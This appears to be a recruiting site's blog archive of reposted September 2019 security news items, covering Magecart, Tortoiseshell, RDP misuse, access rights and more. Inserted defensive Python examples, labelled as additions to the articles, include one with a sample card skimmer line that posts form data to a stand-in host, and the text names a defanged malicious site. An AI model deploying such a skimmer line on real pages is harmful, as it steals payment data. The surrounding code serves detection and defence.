Intelligent Connections. Recruiting Integrity.

Archive for September 2019

Cyber-battle Over Real Model City Planned for Abu Dhabi Security Conference

The daily war waged between cyber-criminals and security experts will be played out in miniature in Abu Dhabi next month using an accurate model of a real city.

As part of the week-long HITB + Cyber Week security conference taking place at the Emirates Palace October 12–17, The Standoff challenge will pit competing teams against each other in a cyber-fight to gain control over a miniature city's digital infrastructure. 

The simulated cyber-battle will take place in a live-fire environment, allowing players to develop valuable insight into vulnerabilities that could be exploited in a real-life cyber-attack. 

The model city has been created to feature technology in use in the critical infrastructure of an actual modern-day metropolis and has its own power plants, freight and passenger trains, banks, and petrochemical facilities. 

Red teams representing attackers will attempt to hack into the city's industrial control systems (ICS) and supervisory control and data acquisition (SCADA) equipment and take control of its traffic systems, electrical plants, and transportation services, while blue teams push back to defend the city's companies.

Under the competition's rules, the blue team will not be allowed any time to study the infrastructure, find weak points, pick attack detection tools, or apply fixes. Instead, they will jump straight into protecting vulnerable services that are about to be targeted by red teams.

Web-application firewall (WAF) rules, next-generation firewall (NGFW) policies, basic account management, and the ability to delete malicious payloads are the only tactics allowed in the blue team's defensive repertoire. Attackers are under no such constraints and can do what they like, provided they don't disturb the infrastructure needed to run the contest. 

Dhillon Kannabhiran, founder and CEO of Hack In The Box (HITB), said: "The Standoff is one of the most challenging attack and defense contests in the world, where teams are competing to find vulnerabilities and attack vectors in real-world critical infrastructure."

The Standoff's hackable city was designed by Positive Technologies as a fun way for cyber-professionals to hone the protection and monitoring skills they use when dealing with real-world cybersecurity problems.

Head of cyber-battle business development at Positive Technologies, Gregory Galkin, said: "We've been working on The Standoff for almost 10 years now. We started with specialized trainings for information security experts and CTF players, but then understood that bringing our expertise even closer to the realities of life is a must in order to maximize the cyber-battle's practical value."

Source: Information Security Magazine

Health Industry Cybersecurity Matrix Launched

America's Healthcare and Public Health Sector Coordinating Council (HSCC) has launched an information-sharing resource aimed at improving the cybersecurity of the healthcare sector.

The new Health Industry Cybersecurity Matrix of Information Sharing Organizations (HIC-MISO) helps users stay on top of the latest security threats by providing them with a convenient list of cybersecurity information-sharing organizations across the United States. 

Featured in the new matrix are details of more than 25 cybersecurity information-sharing organizations and their services, including nine resources geared specifically toward the healthcare industry and the security of medical devices. 

Each listing includes a description of the organization and its mission together with details about any areas of cybersecurity specialization and how much, if anything, they charge for the information they share. 

Errol Weiss, chief security officer of the Health Information Sharing and Analysis Center (H-ISAC) and co-chair of the HSCC Information Sharing Task Group that created the HIC-MISO toolkit, said: "Many health organizations are beginning to understand the importance of cybersecurity information sharing but don't know where to start.

"With cyber-attacks against health organizations increasing in number and severity, one of the most important things an enterprise can do is build awareness and preparedness through community engagement. The HIC-MISO points them in the right direction."

The launch of HIC-MISO follows a recommendation in a 2017 report by a Department of Health and Human Services advisory group, the Healthcare Industry Cybersecurity Task Force, to improve cybersecurity information sharing in the healthcare sector.

A key objective of the matrix is to make it easy for smaller healthcare organizations, which may lack the resources to implement a first-rate cybersecurity system, to engage with the cybersecurity information and defensive tips that are being shared. 

More help is on its way, according to Bill Hagestad, co-lead of the task group behind the new matrix.  

Hagestad said: "The Task Group recognized the broad range of budgets and capabilities across the sector, and accordingly we will begin work to supplement the HIC-MISO with a guide for how organizations can establish an information sharing management structure appropriate to their enterprise size, resources, and risk profile."

Source: Information Security Magazine

Texas Prepares to Implement Mandatory Cybersecurity Training for Government Employees

Preparations are underway in Texas to introduce mandatory annual cybersecurity training for nearly all government employees. 

The Lone Star State passed a House bill to introduce the cyber-safety training into law on June 14 of this year. As if to reinforce the need for Texas to protect itself from cyber-criminals, 23 local government entities in the state were targeted in a single coordinated ransomware attack just two months later.

On Monday, the Texas Department of Information Resources (DIR) announced that it was accepting applications to certify cybersecurity training programs. Under the new legislation, DIR, in consultation with the Texas Cybersecurity Council, must certify at least five such programs.

To be certified, a cybersecurity awareness training program must focus on forming habits and procedures that will help government employees protect information resources. The program must also teach best practices for detecting, assessing, reporting, and addressing information security threats. 

A spokesperson for DIR said: "DIR has worked with statewide stakeholders and the Texas Cybersecurity Council to develop detailed certification criteria and a systematic process for certifying cybersecurity programs. Once DIR certifies a minimum of five training programs, the list of programs will be published on the DIR website."

To be considered for inclusion on the very first list of certified training programs, applicants must submit their security-awareness training programs by Friday, October 4.  

The initial year of the mandatory training will be a rolling certification period, in which additional programs will be certified on a continuing basis. In subsequent years, companies that want to put forward their programs for certification will have to submit them within a designated time frame. To remain on the approved list, training programs will have to be resubmitted for certification annually.

Once the certified programs have been chosen, all mandated state and local government employees will have until June 14, 2020, to complete their cybersecurity training. 

In state agencies, the training will only be mandatory for elected or appointed officials and for employees who use a computer to complete at least 25 percent of their required duties. At local government entities, all elected officials and employees who have access to a local government computer system or database must complete the training.

Local governments can get around the obligatory training if they employ a dedicated information resources cybersecurity officer and have a cybersecurity training program in place already that satisfies the requirement. 

Source: Information Security Magazine

Secure DevOps Practices Expected to Increase for Cloud Apps

Very few companies are securing the majority of their cloud-native apps with DevSecOps practices, according to new research.

According to findings from ESG and Data Theorem, only 8% of companies are securing 75% or more of their cloud-native applications with DevSecOps practices today.

However, 68% of companies are expected to be securing 75% (or more) of their cloud-native applications with DevSecOps practices within two years. The research analyzed 371 responses, and according to Doug Cahill, senior analyst and group practice director of cybersecurity for ESG, while organizations have started, there is more work to be done when it comes to securing their cloud-native apps with the benefits DevSecOps offers.

He said: “Organizations should consider newer approaches to securing their cloud-native apps, particularly solutions that address API-related vulnerabilities, which tops respondents’ minds when identifying their top threat concern.”

Doug Dooley, Data Theorem COO, said that as production workloads are shifting to public cloud platforms, and organizations are quickly adopting serverless functions, they need to understand the associated risks and new threat model they are facing, and the means of addressing cloud native and API risks.

Asked by Infosecurity if they are seeing more companies adopt DevSecOps practices at the moment, or planning to adopt that strategy, Dooley said that security automation is gaining momentum for apps that are run by DevOps teams.

“We are still a few years away before it’s completely mainstream,” he said. “The culture of enterprise security has been a bit reluctant to embrace automation, but it’s the only way the best security teams are keeping up with the pace of DevOps.”

In an email to Infosecurity, Jeff Williams, co-founder and CTO of Contrast Security, said that most organizations secure only a small percentage of their application portfolio, cloud native or not: they typically apply application security tools, techniques and practices to only 10-20% of their apps and APIs, those deemed “critical,” “external,” public facing, or privacy related.

“To help remedy this gap, DevSecOps practices and tools are rapidly being adopted,” Williams said. “However, there is also a disturbing trend to shove the same old AppSec tools onto development teams that don’t have the skills to use them effectively under the guise of ‘shifting left’. Real DevSecOps requires a fundamental change to the way application security work is performed.”

Regarding the increase from 8% to 68% of cloud native app teams practicing DevSecOps, Williams said it is possible, as cloud native apps are close to the ideal scenario for DevSecOps. “However, it won’t happen without hard work to transform the people, process and pipeline in these teams."

Source: Information Security Magazine

Magecart Group Goes After Commercial Router Users

Security researchers have spotted a new tactic being trialed by Magecart hackers: targeting commercial grade routers to skim large volumes of card details.

Magecart is the generic name given to a number of groups using JavaScript code to covertly steal card details from users. The tried-and-tested technique used up until now involves injecting this code into a website’s payment page, either directly or through the compromise of a third-party provider.

However, according to IBM, Magecart Group 5 (MG5) is testing malicious code which could be injected into legitimate JavaScript loaded by Layer 7 routers.

These routers are typically used in venues such as airports, casinos and hotels to serve large numbers of users — theoretically giving the attackers a major haul of card details if they succeed.

“We believe that MG5 aims to find and infect web resources loaded by L7 routers with its malicious code, and possibly also inject malicious ads that captive users have to click on to eventually connect to the internet,” IBM said in its report.

“The compromise can therefore be two-fold: 1. Guest payment data can be stolen when they browse through a compromised router; 2. malicious content can be injected into web pages viewed by all connecting guest devices, including those who pay to use the internet and those connecting to hotels’ free Wi-Fi hot spots.”

IBM also claimed to have found evidence that MG5 had injected malicious digital skimming code into a popular open source mobile module which provides sliding features on devices. This kind of supply chain attack could result in spreading the code to all apps which unwittingly incorporate that module, in order to steal data en masse from users.
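Both attack paths described above (an in-path device rewriting JavaScript that the page legitimately loads, and a tampered module pulled into many apps) come down to the same thing: the bytes that arrive are not the bytes the site owner vetted. Subresource Integrity (SRI) is the browser-side control for the first case, and pinning a digest of a dependency is the same idea for the second. The following is an added example, not code from IBM's report or from any Magecart sample, that simulates what a browser does with an `integrity` attribute: it hashes the script body it actually received and refuses it if the digest does not match. The vendor script, the appended skimmer snippet (inert, it points at a reserved `.invalid` domain) and the hostnames are all constructed for illustration.

```python
"""Subresource Integrity check, simulated outside the browser.

Added example, not from the IBM report or the article. Shows why a script
tag carrying an `integrity` attribute defeats in-path modification of a
legitimate JavaScript resource: the browser hashes the bytes it actually
received and refuses to execute them if the digest differs from the one the
site operator pinned. The script bodies below are constructed.
"""
import base64
import hashlib

# Legitimate vendor script exactly as the site operator pinned it (constructed).
ORIGINAL_JS = (
    b"function checkout(form){"
    b"return fetch('/pay',{method:'POST',body:new FormData(form)});}\n"
)

# Skimmer fragment an in-path device might append (constructed and inert:
# the exfiltration host is a reserved, non-resolving .invalid name).
INJECTED_JS = (
    b"document.addEventListener('submit',e=>{new Image().src="
    b"'https://example.invalid/c?d='+encodeURIComponent("
    b"new URLSearchParams(new FormData(e.target)));});\n"
)

SRI_ALGOS = {"sha256": 1, "sha384": 2, "sha512": 3}   # ranked by strength


def sri_digest(content: bytes, algo: str = "sha384") -> str:
    """Return the integrity value, '<algo>-<base64 digest>', for a resource body."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI permits only sha256, sha384 and sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(received: bytes, integrity: str) -> bool:
    """Mimic the browser's decision for one script body.

    The integrity attribute may list several space-separated values. Browsers
    consider only the values that use the strongest algorithm present and
    accept the resource if any one of those digests matches. This helper
    fails closed when no usable value is present (browsers instead treat an
    unparseable attribute as absent, which is a deliberate difference here).
    """
    usable = [tok for tok in integrity.split() if tok.partition("-")[0] in SRI_ALGOS]
    if not usable:
        return False
    strongest = max(SRI_ALGOS[tok.partition("-")[0]] for tok in usable)
    candidates = {tok for tok in usable if SRI_ALGOS[tok.partition("-")[0]] == strongest}
    algo = next(iter(candidates)).partition("-")[0]
    return sri_digest(received, algo) in candidates


def tampered_script() -> bytes:
    """What a guest device would receive if an L7 router appended the skimmer."""
    return ORIGINAL_JS + INJECTED_JS


if __name__ == "__main__":
    pinned = sri_digest(ORIGINAL_JS)
    print("integrity attribute:", pinned)
    print("clean script accepted:   ", verify_sri(ORIGINAL_JS, pinned))
    print("tampered script accepted:", verify_sri(tampered_script(), pinned))
```

Two caveats a practitioner would want. SRI only protects resources referenced from a page the attacker cannot rewrite; an L7 device that can modify the HTML itself can simply strip the `integrity` attribute, so the real precondition is TLS end to end, with no captive portal or proxy terminating it. And for the module case, a pinned digest in the lockfile catches a swapped package only if someone compares it against a vetted value rather than regenerating it from whatever was downloaded.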

This is in keeping with MG5’s usual MO, which is to reach larger numbers of victims by infecting third-party platforms, improving the ROI of attacks compared with those, such as the raids on British Airways and Newegg, that targeted the website or e-commerce provider directly.

Source: Information Security Magazine

Cleverly Faked Website Targets US Veterans

American military veterans on the hunt for a new job are the latest group to be targeted by bold new threat group Tortoiseshell.

The group, which was discovered earlier this month by researchers at Symantec, has been active since July 2018, primarily targeting IT providers in Saudi Arabia with a mix of customized and "common or garden" malware.

New intelligence published yesterday by Cisco Talos reveals that Tortoiseshell has refocused its criminal campaign to strike at targets in the United States. Talos discovered that team Tortoiseshell was behind a malicious website that has been cleverly crafted to resemble a legitimate recruitment site for US military veterans.

Users of the site hxxp://hiremilitaryheroes[.]com were prompted to download an app that was in reality a downloader, which then deployed further malware and spyware on the victim's machine.

Warren Mercer, technical leader at Cisco Talos, told Infosecurity Magazine that the nature of the attack indicated that Tortoiseshell was hoping to ensnare active military personnel in addition to former servicemen. 

"As it seems they were targeting HR/recruitment efforts, it's possible they hoped to attack current military servicemen as well as current veterans."

Talos would not confirm or deny whether reports that Tortoiseshell is based in Iran are correct. However, what is clear is that should Tortoiseshell get its claws into active members of the military, the outcome could be potentially devastating. 

Mercer told Infosecurity Magazine: "Depending on the victim they are successful compromising, the level of detail/information they [Tortoiseshell] can obtain is very varied. 

"If Tortoiseshell successfully targeted a currently enlisted military professional with access to potentially confidential information, this could become very damaging to the parties involved."

Close attention had been paid to every detail of the malicious website to ensure that it closely mimicked a genuine site in its choice of name, imagery, and the style of language used. However, Mercer said that what might appear to be sophisticated actions by the group were more probably evidence of their dogged resolve. 

Commenting on the site's seemingly genuine appearance, Mercer told Infosecurity Magazine: "This isn’t suggestive of a sophisticated actor; it’s more indicative of a determined actor. They want to ensure that they remain as aligned as possible to their fake website, and the text, images, and domain name help with that."

In carrying out this latest attack, Tortoiseshell used the same backdoor method employed against its targets in the Middle East. Perhaps this reliance on the same tactics, techniques, and procedures (TTPs) will be the group's downfall. 

Source: Information Security Magazine

Access Rights Not Updated for 45% of Employees Who Change Roles

Almost half of employees who switch roles within a company retain unnecessary network access rights, according to the results of a new survey by IT software company Ivanti.

The online survey questioned 400 people, of whom 70% were IT professionals, about what happened in their company when new staff were onboarded and when current employees switched roles or were deprovisioned. 

Asked whether unnecessary access rights are removed when employees change roles, 45% of the respondents said "no." The finding carries extra weight given that more survey respondents worked in government (14.5%) than in any other industry.

When it came to the access rights of employees leaving for new pastures, 13% of those surveyed said that they were not confident that the last person to exit their organization no longer had access to the company's critical systems and information. Only 48% said they were "somewhat confident" that access had been blocked. 

Given what respondents thought their former coworkers might get up to, it's surprising that closer tabs weren't being kept on their access rights. When asked what security risks were a concern in relation to improperly deprovisioned employees, 38% said a leak of sensitive data, 26% feared a cybersecurity hack through an unmanaged account, and 24% were concerned about malicious data detection/theft. 

Perhaps the survey's most worrying finding was that 52% of respondents admitted that either they or somebody they knew still had access to a former employer’s applications and data.

Most of the respondents (84%) were based in the US, but the online survey was also completed by people in the Netherlands, the UK, and Canada. 

Senior director of information technology at Ivanti, Adam Jones, told Infosecurity Magazine: "If you don’t know where you are vulnerable, it creates big issues and problems, especially when people can access privileges they shouldn’t. It creates an opportunity for exploitation by cyber-criminals or disgruntled employees (malicious insiders)."

It isn't clear from the survey whether access rights are being mismanaged due to the absence of proper assignment and management processes or because the trouble isn't being taken to regularly monitor permissions and update them as necessary. 

"Essentially, manually monitoring these processes is a productivity vampire," said Jones. "People often fail to complete their manual checklists, and we’ve even heard of instances where HR terminates an employee and forgets to tell their IT team.  

"Make sure you have the tools to automate manual tasks, so that you can monitor just the exceptions for when something doesn’t go right." 
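The survey's mover and leaver findings, and the advice to automate and review only the exceptions, describe a reconciliation job: compare what HR says a person is entitled to against what the systems actually grant, and report the difference. The following is an added example, not Ivanti's code or anything from the survey, of that comparison. The role model, the HR feed and the current grants are all constructed records; in practice the first two come from the HR system and the last from directory and application exports.

```python
"""Joiner/mover/leaver reconciliation: find access a role no longer justifies.

Added example, not Ivanti's code. Compares an HR feed (who holds which role,
who has left) against the entitlements actually granted in systems and
reports only the exceptions. All records below are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Role model: the entitlements each role is allowed to hold (constructed).
ROLE_ENTITLEMENTS: Dict[str, Set[str]] = {
    "payroll-clerk": {"hr-portal:read", "payroll:edit"},
    "helpdesk":      {"ad:password-reset", "ticketing:agent"},
    "sysadmin":      {"ad:domain-admins", "vpn:full", "ticketing:agent"},
}


@dataclass
class Employee:
    uid: str
    role: Optional[str]                      # None means the person has left
    previous_roles: List[str] = field(default_factory=list)


# HR feed after a round of moves and departures (constructed).
EMPLOYEES = [
    Employee("alice", "helpdesk", previous_roles=["sysadmin"]),  # moved to a lower-privilege role
    Employee("bob", "payroll-clerk"),
    Employee("carol", None, previous_roles=["helpdesk"]),        # terminated
    Employee("dave", "sysadmin"),
]

# What the directory and applications actually show today (constructed).
CURRENT_GRANTS: Dict[str, Set[str]] = {
    "alice": {"ad:domain-admins", "vpn:full", "ticketing:agent", "ad:password-reset"},
    "bob":   {"hr-portal:read", "payroll:edit"},
    "carol": {"ad:password-reset", "ticketing:agent"},
    "dave":  {"ad:domain-admins", "vpn:full", "ticketing:agent"},
    "erin":  {"vpn:full"},                                        # no HR record at all
}


@dataclass
class Finding:
    uid: str
    kind: str            # "leaver", "mover", "overprovisioned" or "orphan"
    excess: Set[str]     # grants the current role does not justify


def reconcile(employees: List[Employee],
              role_entitlements: Dict[str, Set[str]],
              current_grants: Dict[str, Set[str]]) -> List[Finding]:
    """Return one Finding per account whose grants exceed what its role allows.

    Accounts that match their role exactly produce nothing, so the output is
    the exception list a reviewer would actually look at.
    """
    findings: List[Finding] = []
    by_uid = {e.uid: e for e in employees}
    for uid, grants in sorted(current_grants.items()):
        emp = by_uid.get(uid)
        if emp is None:                       # account with no owner in HR
            findings.append(Finding(uid, "orphan", set(grants)))
            continue
        if emp.role is None:                  # leaver: any grant at all is excess
            if grants:
                findings.append(Finding(uid, "leaver", set(grants)))
            continue
        allowed = role_entitlements.get(emp.role, set())   # unknown role allows nothing
        excess = set(grants) - allowed
        if excess:
            kind = "mover" if emp.previous_roles else "overprovisioned"
            findings.append(Finding(uid, kind, excess))
    return findings


if __name__ == "__main__":
    for f in reconcile(EMPLOYEES, ROLE_ENTITLEMENTS, CURRENT_GRANTS):
        print(f"{f.kind:15} {f.uid:8} {sorted(f.excess)}")
```

Run daily against fresh exports this gives exactly the "monitor just the exceptions" view Jones describes. Its precondition is a maintained role model: where one is missing (the survey cannot tell which of the two causes applies), the job still reports leavers and orphan accounts, since those need no role model, but cannot judge movers.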

Source: Information Security Magazine

Malicious RDP Behavior Detected in 90% of Organizations

A new study has found suspicious use of a popular remote-access tool in almost all of the organizations that use it. 

The Remote Desktop Protocol (RDP) has become a virtually indispensable part of modern business operations, as it allows users to control systems from afar without losing any functionality. 

Research published today by Californian tech firm Vectra has revealed suspicious RDP behaviors in 90% of companies using RDP, with organizations in the manufacturing, finance and insurance, retail, government, and healthcare industries identified as being most at risk of attack.

Researchers used Vectra's Cognito platform to monitor metadata collected from network traffic between more than four million workloads and devices in customer cloud, data centers, and enterprise environments between January and June 2019. 

During the six-month period, the platform detected 26,800 suspicious RDP behaviors. The true number could be higher, since Cognito was configured to flag only two specific behaviors. The first is repeated failed attempts to establish an RDP connection to a workload or host; the second is a successful connection with unusual characteristics, for example a host that is normally reached from clients with an English keyboard layout being connected to from a client with a French keyboard layout. 
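The two behaviors Vectra's platform was configured to flag are simple enough to express directly. The following is an added example, not Vectra's code, that implements both over a list of RDP connection records: a burst of failed connections from one source to one host inside a short window, and a successful connection whose client keyboard layout differs from every layout that host has previously accepted. The records are constructed; in practice the fields would come from RDP session metadata (the client announces its keyboard layout during the connection handshake) or from the target's logon events. The threshold, window and baseline size are assumptions chosen for the sample, not figures from the report.

```python
"""Two RDP detections over connection metadata, as an added example.

Not Vectra's code. Implements the two behaviors the article says Cognito was
configured for: (1) repeated failed RDP connection attempts from one source
to one host within a short window, and (2) a successful connection whose
client keyboard layout differs from what that host has seen before.
The records below are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

# Windows keyboard-layout identifiers used in the constructed records:
# 0x0409 is US English, 0x040C is French (France).
EVENTS = [
    # (timestamp, src, dst, outcome, client keyboard layout)
    ("2019-03-04T09:00:00", "10.1.1.20",   "10.1.5.7", "success", 0x0409),
    ("2019-03-04T09:30:00", "10.1.1.21",   "10.1.5.7", "success", 0x0409),
    ("2019-03-04T22:01:00", "203.0.113.9", "10.1.5.7", "fail",    0x040C),
    ("2019-03-04T22:01:05", "203.0.113.9", "10.1.5.7", "fail",    0x040C),
    ("2019-03-04T22:01:11", "203.0.113.9", "10.1.5.7", "fail",    0x040C),
    ("2019-03-04T22:01:18", "203.0.113.9", "10.1.5.7", "fail",    0x040C),
    ("2019-03-04T22:01:25", "203.0.113.9", "10.1.5.7", "fail",    0x040C),
    ("2019-03-04T22:02:40", "203.0.113.9", "10.1.5.7", "success", 0x040C),
    ("2019-03-05T08:15:00", "10.1.1.20",   "10.1.5.7", "success", 0x0409),
]

# Tuning values are assumptions for this sample, not figures from the report.
FAIL_THRESHOLD = 5                    # failures from one src to one dst ...
FAIL_WINDOW = timedelta(minutes=2)    # ... within this window
MIN_BASELINE = 2                      # successes needed before a host's layouts count as "normal"

Alert = Tuple[str, str, str, str]     # (timestamp, detection, src, dst)


def detect(events, fail_threshold: int = FAIL_THRESHOLD,
           fail_window: timedelta = FAIL_WINDOW,
           min_baseline: int = MIN_BASELINE) -> List[Alert]:
    """Return alerts in event order for the two behaviors described above."""
    alerts: List[Alert] = []
    recent_fails: Dict[Tuple[str, str], Deque[datetime]] = defaultdict(deque)
    layouts_seen: Dict[str, Dict[int, int]] = defaultdict(lambda: defaultdict(int))
    fired: set = set()

    for ts_s, src, dst, outcome, layout in sorted(events):   # ISO timestamps sort lexically
        ts = datetime.fromisoformat(ts_s)
        key = (src, dst)

        if outcome == "fail":
            q = recent_fails[key]
            q.append(ts)
            while q and ts - q[0] > fail_window:       # drop failures outside the window
                q.popleft()
            if len(q) >= fail_threshold and key not in fired:
                alerts.append((ts_s, "repeated_failed_rdp", src, dst))
                fired.add(key)   # one alert per src/dst pair in this sample; a real detector would re-arm
            continue

        # Successful connection: compare the client's layout with the host's baseline
        # before recording it, so the anomalous layout does not whitelist itself.
        baseline = layouts_seen[dst]
        if sum(baseline.values()) >= min_baseline and layout not in baseline:
            alerts.append((ts_s, "unusual_keyboard_layout", src, dst))
        baseline[layout] += 1

    return alerts


if __name__ == "__main__":
    for ts, name, src, dst in detect(EVENTS):
        print(f"{ts} {name:24} {src} -> {dst}")
```

The second rule is a heuristic and behaves exactly as the article implies: a legitimate French-speaking administrator connecting to a host that has only ever seen US layouts will trip it, which is why this is a behaviour to investigate rather than a verdict. The first rule's value is in the per-source, per-host window; counting failures globally would drown a single brute-force source in the background noise of mistyped passwords.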

Manufacturing organizations had the highest rate of dodgy RDP detections, with mid-sized operations showing a detection rate twice as high as the industry's average, which was 10 detections per 10,000 workloads and devices.

Together, the finance and insurance, manufacturing, and retail industries accounted for 49.8% of all suspect RDP detections. 

Alarming as the findings are, they come as no surprise to Vectra's head of security, Chris Morales, who told Infosecurity Magazine: "RDP is so widely used in different organizations that a high rate of misuse is inevitable. It's used in multiple forms of attacks as attackers look to hide from detection.

"The rate of detection in the six-month period is consistent with what Vectra has monitored over an extended period of time. RDP is a regular occurrence in attacks and a staple tool of the attackers' toolkit."

Despite the cybersecurity risk posed by RDP, Morales foresees no sunset on the tool's use. He told Infosecurity Magazine: "The business value delivered by RDP will ensure its continued use, and it will therefore continue to represent significant risk as an exposed attack surface."

Asked if we should all ditch the internet and go back to using fax machines, Morales said: "I do not think so. We just need to be more diligent in how we use services and thoughtful in their implementation."

Source: Information Security Magazine

LORCA Launches Open Call for Fourth Cohort of Cybersecurity Innovators

The London Office for Rapid Cybersecurity Advancement (LORCA) has announced the launch of its global open call for its fourth cohort of cyber-scaleups.

LORCA, launched in June 2018 and hosted at Plexal, an innovation center located in the Here East campus in London’s Queen Elizabeth Olympic Park, aims to bolster the UK’s cybersecurity sector and make the internet safer for everyone by supporting the most promising later-stage companies.

LORCA offers 12-month programs from which companies can benefit from a collaborative ecosystem of academia, innovators, government, investors and industry.

It has already welcomed three cohorts of companies into its previous programs; these companies have gone on to raise over £58m in investment and win 514 contracts.

LORCA is now inviting new applications based on three innovation themes, after consulting with industry leaders from various sectors about their most pressing cyber-challenges and the types of solutions they need from the market in the future.

The three themes are: connected economy, connected everything and connected everyone.

The latest cohort will receive bespoke support with scaling in the UK and abroad, as well as access to commercial and engineering experts through delivery partners Deloitte and the Centre for Secure Information Technologies (CSIT) at Queen’s University Belfast.

Saj Huq, program director, LORCA, said: “As technology increasingly impacts all aspects of business and society, it’s clear that a cybersecurity paradigm shift is needed. Now more than ever, we need to support the development of cutting-edge innovations across the board to help us lead safer digital lives, keep our infrastructure secure and protect our digital economy from complex and evolving cyber threats. Given its increasing significance within a world that is more connected by the day, cybersecurity has to be everywhere – and serve everyone.”

The deadline for applying is Monday, November 4, 2019.

Source: Information Security Magazine

Experts Question ECJ’s Right to be Forgotten Ruling

Google’s victory in a landmark right to be forgotten case asks more questions than it answers, according to legal and technology experts.

The European Court of Justice (ECJ) ruled yesterday that the search giant only needs to remove links from its services inside the EU in order to comply with legitimate right to be forgotten/right to erasure requests.

French privacy regulator CNIL had demanded that Google remove links globally to pages containing false or damaging info on a person, in a case dating back to 2015.

Part of Google’s argument for not removing info outside the EU was that the law could be exploited by oppressive governments to cover up abuses and control the flow of information, much as China does with its Great Firewall censorship apparatus.

“Since 2014, we've worked hard to implement the right to be forgotten in Europe, and to strike a sensible balance between people's rights of access to information and privacy,” the search giant said of the result. “It's good to see that the court agreed with our arguments.”

However, some argued that the ruling undermines the right to be forgotten by failing to institute the law globally.

“Google is normally able to detect visitors from Europe to its global search engines and block them from seeing certain web pages containing sensitive information about individuals from queries made using their names,” explained Simon Migliano, head of research at Top10VPN.

“However, anyone connected to a VPN server located outside Europe will evade such detection and be able to view those results regardless of any 'right to be forgotten' decision in place. This loophole highlights the significant limitations of geo-restricting contentious web content in this day and age.”

Mishcon de Reya data protection adviser, Jon Baines, added that there are still question marks over what happens to the UK if it leaves the EU without a deal.

“Will UK search engine domains retain links to information removed from EU search engine domains? Or might the UK decide ultimately to give effect to delinking decisions made in the EU? Private individuals, as well as businesses, will want urgent clarification on this from government,” he argued.

EU citizens have been able to request information on them be removed from the web since 2014. However, since then, the GDPR has made it easier for EU citizens to request that such information be expunged from the web, with its right to erasure clause. Providers have a month to respond to a verbal or written request.

Ron Moscona, a partner at international law firm Dorsey & Whitney, explained that the ruling has failed to add clarity on how and when the GDPR should be limited in scope to within the EU.

“The provisions of Article 3 of GDPR that define its territorial effect clearly extend the legal rights and obligations of GDPR, in many circumstances, to the processing of personal data outside the EU including by entities operating outside the EU,” he said.

“Today’s decision of the EU court does not address these broader territorial issues.”

Source: Information Security Magazine